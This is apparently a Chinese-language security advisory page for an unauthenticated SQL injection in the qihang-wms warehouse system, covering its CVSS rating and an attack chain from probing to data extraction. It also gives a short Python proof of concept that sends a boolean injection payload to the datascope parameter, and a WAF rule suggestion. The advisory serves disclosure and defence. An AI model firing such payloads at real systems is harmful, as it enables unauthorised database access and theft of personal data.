CVE-2026-37429 CVSS 6.5 中危

CVE-2026-37429 qihang-wms SQL注入漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-37429

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

qihang-wms

漏洞概述

qihang-wms系统在commit 75c15a版本中被发现存在SQL注入漏洞。该漏洞出现在SysUserMapper.xml文件的datascope参数处理逻辑中，由于缺乏有效的过滤机制，攻击者可利用此漏洞通过构造特定的恶意SQL语句，非法获取数据库中的敏感信息，严重威胁用户个人身份信息（PII）安全。

技术细节

该漏洞属于典型的SQL注入漏洞，具体位于qihang-wms系统的MyBatis映射文件SysUserMapper.xml中。开发人员在处理datascope参数时，未能对用户输入进行严格的过滤或转义，极有可能使用了字符串拼接的方式（如${datascope}）构建SQL查询，而非安全的参数化查询。由于CVSS向量显示无需用户交互且无需权限（PR:N），攻击者可直接向受影响接口发送包含恶意SQL语法的HTTP请求。利用该漏洞，攻击者能够执行任意SQL命令，绕过应用层安全机制直接查询底层数据库，进而提取包括管理员凭证、用户个人身份信息（PII）等在内的敏感数据，对系统造成严重的数据泄露风险。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标正在使用qihang-wms系统，并定位到包含datascope参数的API接口。

STEP 2

2. 漏洞探测

攻击者向datascope参数发送特定的SQL注入测试载荷（如单引号或逻辑判断语句），观察服务器响应以确认SQL注入漏洞的存在。

STEP 3

3. 数据提取

确认漏洞后，攻击者构造UNION SELECT或布尔盲注语句，查询SysUserMapper.xml关联的数据库表，提取用户PII及其他敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://target-domain.com/api/sysUser/list"

# Malicious payload targeting the 'datascope' parameter
# Using a simple boolean-based SQL injection test
payload = {
    "datascope": "1' AND 1=1-- "
}

try:
    # Send GET request with the malicious payload
    response = requests.get(target_url, params=payload)

    # Check if the response indicates successful injection
    if response.status_code == 200:
        print("[+] Potential SQL Injection vulnerability detected.")
        print("[+] Response:", response.text[:200])
    else:
        print("[-] Request returned status code:", response.status_code)

except Exception as e:
    print("[!] Error occurred:", str(e))

影响范围

qihang-wms commit 75c15a

防御指南

临时缓解措施

建议在Web应用防火墙（WAF）中部署针对datascope参数的SQL注入防护规则，拦截包含UNION、SELECT、单引号等关键字符的恶意流量，作为临时缓解措施直至代码修复完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表